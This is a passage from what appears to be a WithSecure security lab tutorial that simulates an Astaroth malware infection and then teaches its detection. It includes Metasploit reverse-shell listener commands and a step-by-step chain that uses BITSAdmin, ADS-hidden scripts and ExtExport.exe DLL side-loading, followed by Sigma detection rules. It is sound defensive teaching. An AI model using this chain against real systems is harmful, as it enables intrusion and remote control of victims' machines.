listening:<\/p>\n<pre><code class=\"language-bash\"># Define the payload used:\nset PAYLOAD windows\/meterpreter\/reverse_tcp\n\n# Define the listening host:\nset LHOST &lt;OUR_IP&gt;\n\n# Define the listening port:\nset LPORT 4444\n\n# Start the handler:\nexploit<\/code><\/pre>\n<p>The description of the payload we have chosen reads &quot;Windows Meterpreter (Reflective Injection), Reverse TCP Stager&quot;, which means that this is a Meterpreter implant that communicates back to the Metasploit server over the TCP protocol.<\/p>\n<p>Metasploit uses a specific naming convention for payloads:<\/p>\n<pre><code class=\"language-bash\">&lt;platform&gt; \/ &lt;architecture&gt; \/ &lt;payload type&gt; \/ &lt;communication type&gt;<\/code><\/pre>\n<p>Meterpreter is Metasploit&#x27;s standard implant, and its definition is the following (kindly borrowed from <a href=\"https:\/\/www.offensive-security.com\/metasploit-unleashed\/about-meterpreter\" target=\"_blank\" rel=\"noopener\">Offensive Security<\/a>):<\/p>\n<p>Meterpreter is an advanced, dynamically-extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.<\/p>\n<p>The C2 framework is now ready to receive connections.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/metasploit-meterpreter-listener.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>6 &#8211; Attack Execution<\/h3>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/adf-code-exec-astaroth-edit2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Now that all the pieces are in place, we are ready to carry out the attack. To do so, we just need to follow the steps detailed below:<\/p>\n<p>&#8211;<\/p>\n<p>First, move the &quot;create_dropper_lnk.bat&quot; batch file to the Windows VM that will act as the target (any directory is fine) and execute it. This will create a shortcut file named &quot;clickme.lnk&quot; that will imitate the Infection Vector in the real attack.<\/p>\n<p>&#8211;<\/p>\n<p>On the attacking machine, move to the directory where the payloads are stored and set up a HTTP server as described above.<\/p>\n<p>&#8211;<\/p>\n<p>Open up a Metasploit console and set up a listener for a reverse Meterpreter shell over TCP, again following the steps already outlined.<\/p>\n<p>&#8211;<\/p>\n<p>Back to the target machine, it is time for the user to click on that completely benign-looking file. This will trigger the whole attack chain.<\/p>\n<p>&#8211;<\/p>\n<p>Turns out the &quot;clickme&quot; shortcut file is a dropper &#8211; who would have thought! After executing, this binary uses BITSAdmin to fetch the next step of the attack chain, a stager batch file. This stager gets automatically executed and performs two actions:<\/p>\n<p>&#8211;<\/p>\n<p>First it reaches back to our C2 server, retrieves our DLL payload, renames it and stores it in &quot;C:\\Users\\Public\\Libraries\\raw\\&quot;.<\/p>\n<p>&#8211;<\/p>\n<p>Second, it generates a VBS script and copies it to the Alternate Data Stream of &quot;desktop.ini&quot; inside the same directory, hiding it from unwanted eyes. The original script is immediately deleted.<\/p>\n<p>&#8211;<\/p>\n<p>This now hidden script is accessed and executed by the stager, creating the final launcher file in shortcut format (.lnk).<\/p>\n<p>&#8211;<\/p>\n<p>Almost there! In its final step, the stager executes the shortcut file, which launches ExtExport.exe &#8211; a LOLBin bundled in Internet Explorer &#8211; pointing to the directory where the suitably-renamed DLL payload is stored. If successful, the DLL is side-loaded and the embedded payload is executed.<\/p>\n<p>&#8211;<\/p>\n<p>Voila! A Meterpreter session appears in the terminal of our attacking machine. Good job!<\/p>\n<h2>Detection<\/h2>\n<p>We are now aware of how the attackers behind the Astaroth campaign conducted a large part of their operation. So how do we detect them?<\/p>\n<p>The following section describes some of the ways in which the abuse of the techniques we just discussed can be detected, with a few insights into some of the implementations Countercept used when facing with this threat.<\/p>\n<p>Most of the tools we are going to use to this end can be categorised as one of the following types:<\/p>\n<ul>\n<li>Event Logs<\/li>\n<li>Stand Alone Tools and Scripts<\/li>\n<li>Sigma Rules<\/li>\n<\/ul>\n<p>Apart from the event logs, to follow along with some of the examples we recommend installing the following tools:<\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/Neo23x0\/sigma#sigmac\" target=\"_blank\" rel=\"noopener\">Sigma &#8211; Sigmac<\/a><\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/sysmon\" target=\"_blank\" rel=\"noopener\">Sysmon<\/a> (SwiftOnSecurity&#x27;s <a href=\"https:\/\/github.com\/SwiftOnSecurity\/sysmon-config\" target=\"_blank\" rel=\"noopener\">config<\/a> will serve us well here)<\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/streams\" target=\"_blank\" rel=\"noopener\">Streams<\/a><\/li>\n<\/ul>\n<h3>BITSAdmin<\/h3>\n<p>As explained in the introduction, although initially designed for download and upload jobs, BITSAdmin can actually be abused by an attacker for a number of different tasks. In the next section we describe some ways in which some of these malicious actions can be detected.<\/p>\n<h3>SC Query<\/h3>\n<p>BITSAdmin is started as a service, so a quick way to know if an instance is running is to use the sc command to query for the BITS service.<\/p>\n<pre><code class=\"language-bash\">sc query bits<\/code><\/pre>\n<p>We could also use events with an EID of 7036 for the BITS service entering a running state.<\/p>\n<p>QMGR Database<\/p>\n<p>The Queue Manager Database (QMGR) is a database that stores the records of all the executed BITS jobs. It can be found in:<\/p>\n<pre><code class=\"language-bash\">C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db<\/code><\/pre>\n<p>Unfortunately the contents of this database is hex encoded, but a quick workaround to get some useful information from it is to grep or filter for &quot;http&quot; to get a list of all the IPs of the files that have been downloaded using this tool.<\/p>\n<h3>Sigma Rules<\/h3>\n<p>There are a few already made Sigma rules that cover detection for some of the use cases mentioned above. Here we are going to talk about two of, in our opinion, most useful ones for general purposes.<\/p>\n<h3>BITSAdmin Download<\/h3>\n<p>This first <a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/1b42f2a0e29593d4a1d08f89d87e73fb95d7626c\/rules\/windows\/process_creation\/win_process_creation_bitsadmin_download.yml\" target=\"_blank\" rel=\"noopener\">rule<\/a> is the most useful for the scenario described in the lab. It detects every instance of BITSAdmin using the \/transfer flag to download a file.<\/p>\n<pre><code class=\"language-bash\">title: Bitsadmin Download\nid: d059842b-6b9d-4ed1-b5c3-5b89143c6ede\nstatus: experimental\ndescription: Detects usage of bitsadmin downloading a file\nreferences:\n- https:\/\/blog.netspi.com\/15-ways-to-download-a-file\/#bitsadmin\n- https:\/\/isc.sans.edu\/diary\/22264\ntags:\n- attack.defense_evasion\n- attack.persistence\n- attack.t1197\n- attack.s0190\ndate: 2017\/03\/09\nmodified: 2019\/12\/06\nauthor: Michael Haag\nlogsource:\ncategory: process_creation\nproduct: windows\ndetection:\nselection1:\nImage:\n- &#x27;*\\bitsadmin.exe&#x27;\nCommandLine:\n- &#x27;* \/transfer *&#x27;\nselection2:\nCommandLine:\n- &#x27;*copy bitsadmin.exe*&#x27;\ncondition: selection1 or selection2\nfields:\n- CommandLine\n- ParentCommandLine\nfalsepositives:\n- Some legitimate apps use this, but limited.\nlevel: medium<\/code><\/pre>\n<h3>BITSAdmin via PowerShell<\/h3>\n<p>Another use case for BITSAdmin we have not spoken about yet is using the following PowerShell cmdlet to start a job.<\/p>\n<pre><code class=\"language-bash\">Start-BitsTransfer<\/code><\/pre>\n<p>For example, using:<\/p>\n<pre><code class=\"language-bash\">Start-BitsTransfer -Source &lt;source_url&gt; -Destination &lt;destination_path&gt;<\/code><\/pre>\n<p>This next <a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/48d95f027c9e196ef1e6b37416ec4f89beb0aaf5\/rules\/windows\/process_creation\/win_powershell_bitsjob.yml\" target=\"_blank\" rel=\"noopener\">rule<\/a> would cover us in such scenarios.<\/p>\n<pre><code class=\"language-bash\">title: Suspicious Bitsadmin Job via PowerShell\nid: f67dbfce-93bc-440d-86ad-a95ae8858c90\nstatus: experimental\ndescription: Detect download by BITS jobs via PowerShell\nreferences:\n- https:\/\/eqllib.readthedocs.io\/en\/latest\/analytics\/ec5180c9-721a-460f-bddc-27539a284273.html\n- https:\/\/github.com\/redcanaryco\/atomic-red-team\/blob\/master\/atomics\/T1197\/T1197.md\nauthor: Endgame, JHasenbusch (ported to sigma for oscd.community)\ndate: 2018\/10\/30\nmodified: 2019\/11\/11\ntags:\n- attack.defense_evasion\n- attack.persistence\n- attack.t1197\nlogsource:\ncategory: process_creation\nproduct: windows\ndetection:\nselection:\nImage|endswith: &#x27;\\powershell.exe&#x27;\nCommandLine|contains: &#x27;Start-BitsTransfer&#x27;\ncondition: selection\nfields:\n- ComputerName\n- User\n- CommandLine\nfalsepositives:\n- Unknown\nlevel: medium<\/code><\/pre>\n<h3>Event Logs<\/h3>\n<p>The following event log contains the download state, source, user and file information for each BITS transfer job carried out on a system:<\/p>\n<ul>\n<li>Microsoft-Windows-BITS-Client\/Operational log.evtx<\/li>\n<\/ul>\n<p>Depending on existing coverage, it might be worth ingesting this log and monitoring for these BITSAdmin events. To filter down the high amount of events, it is worth looking for event ID 59. This will show information on the URL the BITSAdmin job connected to.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/bitsadmin-evtx.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>In many cases, any connection to a non-local address will justify investigation, and this can be further correlated with threat intelligence feeds to add more context to the alerts, for example. The BITSAdmin client also has a User Agent of &quot;BITS&quot;. Ingesting web proxy logs, filtering on this User Agent would allow you to identify all hosts talking externally with this LOLBin.<\/p>\n<h3>ExtExport.exe<\/h3>\n<h3>Windows Defender<\/h3>\n<p>Windows Defender has a behaviour-based detection for suspicious use of the ExtExport.exe binary (Behavior:Win32\/ExtExportAbuse.B).<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/windefender-alert-extexportabuse.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>However, as we have seen this is often not enough, so it is a good idea to add some detection of our own.<\/p>\n<h3>Sigma Rule<\/h3>\n<p>ExtExport.exe process execution is quite unusual, so that in itself could be enough of an indicator worth checking. For more accuracy, we could also check the parameters, specially if a path is given, followed by two additonal random arguments.<\/p>\n<p>A homemade Sigma rule could look as follows:<\/p>\n<pre><code class=\"language-bash\">title: ExtExport.exe DLL Side Loading\nid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\nstatus: experimental\ndescription: Detects ExtExport.exe with arguments being executed. Could indicate a DLL Side-Loading attempt.\nreferences:\n- https:\/\/lolbas-project.github.io\/lolbas\/Binaries\/Extexport\/\n- http:\/\/www.hexacorn.com\/blog\/2018\/04\/24\/extexport-yet-another-lolbin\/\ntags:\n- attack.execution\n- attack.defense_evasion\n- attack.t1059\n- attack.t1073\nauthor: Martin, Anartz\ndate: 2020\/06\/30\nlogsource:\ncategory: process_creation\nproduct: windows\ndetection:\nselection:\nImage:\n- &#x27;*\\extexport.exe&#x27;\nfilter:\nCommandLine:\n- &#x27;^[Cc]\\:\\\\[Pp]rogram\\ [Ff]iles(\\ \\([Xx]86\\))?\\\\[Ii]nternet\\ [Ee]xplorer\\\\[Ee]xt[Ee]xport\\.exe$&#x27;\ncondition: selection and not filter\nfields:\n- CommandLine\nfalsepositives:\n- Depending on the estate activity. They should be rare.\nlevel: medium<\/code><\/pre>\n<p>The rule should be further refined by baselining it against the usual activity in the estate, whitelisting any legitimate use case for this binary.<\/p>\n<p>The next image shows a successful detection for suspicious ExtExport.exe use, done by our managed detection and response solution.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/extexport-detection.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>Alternate Data Stream (ADS)<\/h3>\n<h3>Dir Command<\/h3>\n<p>If we are already suspicious of a specific file, one of the easiest, most straightforward ways of confirming if there is a rogue ADS in it is to run a dir \/R command on the directory the file is in.<\/p>\n<pre><code class=\"language-bash\">dir \/R &lt;target_directory&gt;<\/code><\/pre>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/stager-dir2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Of course, this is certainly not the situation we are most commonly in, and we ideally want to develop detection mechanisms that will alert us of an attack upon execution.<\/p>\n<h3>Tools and Scripts<\/h3>\n<p>The main problem when it comes to ADS is that there are a great variety of file formats that can be stored in the alternate data stream of a given file. This means there are also many ways of executing a hidden payload and, therefore, different execution detection mechanisms to use depending on the scenario. Additionally, the reported size (and hash!) of the file containing the ADS payload does not change after our malicious file is added.<\/p>\n<p>However, there are some tools at our disposal that can help us automate and speed up the process of recursively gathering all the data streams in a given directory.<\/p>\n<p><a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/streams\" target=\"_blank\" rel=\"noopener\">Streams<\/a> is a tool in the Sysinternals suite that examines a given file or directory and returns a list of the names and sizes of any ADS it encounters. A nice touch is that it also allows us to delete the streams with the &quot;-d&quot; flag.<\/p>\n<pre><code class=\"language-bash\">streams [-s] [-d] &lt;file_or_directory&gt;<\/code><\/pre>\n<p>In a similar manner, the PowerShell scripts <a href=\"https:\/\/github.com\/forgottentq\/powershell\/blob\/master\/find-steams.ps1\" target=\"_blank\" rel=\"noopener\">find-steams.ps1<\/a> and <a href=\"https:\/\/github.com\/p0shkatz\/Get-ADS\" target=\"_blank\" rel=\"noopener\">Get-ADS.ps1<\/a> provide similar functionality, and they may be easier to automate.<\/p>\n<h3>Sigma Rule<\/h3>\n<p>For a less forensic and more active detection approach, you can feed the following Sigma <a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/master\/rules\/windows\/powershell\/powershell_ntfs_ads_access.yml\" target=\"_blank\" rel=\"noopener\">rule<\/a> into your SIEM and monitor for data written into NTFS ADS (with the caveats that it only detects it when it spawns from a PowerShell process and that Script Block Logging needs to be active).<\/p>\n<pre><code class=\"language-bash\">title: NTFS Alternate Data Stream\nid: 8c521530-5169-495d-a199-0a3a881ad24e\nstatus: experimental\ndescription: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.\nreferences:\n- http:\/\/www.powertheshell.com\/ntfsstreams\/\ntags:\n- attack.defense_evasion\n- attack.t1096\n- attack.t1564.004\nauthor: Sami Ruohonen\ndate: 2018\/07\/24\nlogsource:\nproduct: windows\nservice: powershell\ndefinition: &#x27;It is recommended to use the new &quot;Script Block Logging&quot; of PowerShell v5 https:\/\/adsecurity.org\/?p=2277&#x27;\ndetection:\nkeyword1:\n- &quot;set-content&quot;\n- &quot;add-content&quot;\nkeyword2:\n- &quot;-stream&quot;\ncondition: keyword1 and keyword2\nfalsepositives:\n- unknown\nlevel: high<\/code><\/pre>\n<p>A more generic approach to detect code execution using ADS, like the one we use currently, involves monitoring for a known list of usual suspect processes running a binary or script in an ADS by parsing the image name and checking if the arguments are in ADS format and contain a file in them (have a colon &quot;:&quot; and a known extension), together with various whitelisting filters resulting from some exhaustive baselining.<\/p>\n<h3>Sysmon<\/h3>\n<p>Finally, it is also worth mentioning that Sysmon also offers ADS creation logging <a href=\"https:\/\/www.dshield.org\/forums\/diary\/Sysmon+and+Alternate+Data+Streams\/26292\/\" target=\"_blank\" rel=\"noopener\">capability<\/a>, although this might require a decent amount of fine tuning to make the amount of data it generates manageable.<\/p>\n<h2>Conclusions<\/h2>\n<p>The main goal of this lab was to present the reader with a simplified version of a real world threat in order to give an engaging and holistic view of the whole attack and defence cycle. We observed the use of several code execution techniques, including the use of LOLBins and Alternate Data Streams, and identified detection opportunities both from a forensic perspective and in terms of active monitoring. Several sigma rules have been provided that seek to detect the offensive actions we performed.<\/p>\n<p>The main takeaways from this first lab are:<\/p>\n<ul>\n<li>An opportunity to simulate an, albeit slightly simplified, code execution flow of real-world Astaroth malware.<\/li>\n<li>The use of process creation events for specific command line entries relating to the creation of alternate data streams, and BITSAdmin.<\/li>\n<li>Use of additionally tooling to identify instances of ADS and BITS jobs.<\/li>\n<\/ul>\n<p>In the next lab, we&#x27;ll adapt our malware to include persistence mechanisms. You can find the guide for that lab <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20Code%20Execution%20and%20Persistence%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/darkgate-rises\/\">Mehr erfahren<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Reverse engineering a Lumma infection<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Lumma is an information stealer that the WithSecure Detection and Response Team (DRT) have encountered several times. It has seen wider use over the past couple of years, and makes for an interesting threat to monitor.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/reverse-engineering-a-lumma-infection\/\">Mehr erfahren<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Machine learning-driven malware analysis<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">With the rapid emergence of new malware variants, accurately classifying and attributing malware samples has become more challenging than ever<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/machine-learning-driven-malware-analysis\/\">Mehr erfahren<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>For this first lab we are going to carry out a simplified simulation of a real Astaroth compromise, much like the ones we have detected. <\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[310,380,312],"labs_content_type":[313],"class_list":["post-10574","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-offensive-security","category-threat-intelligence"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Offensive security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #1<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">For this first lab we are going to carry out a simplified simulation of a real Astaroth compromise, much like the ones we have detected. <\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/\">Mehr erfahren<\/a>            <\/div>\n            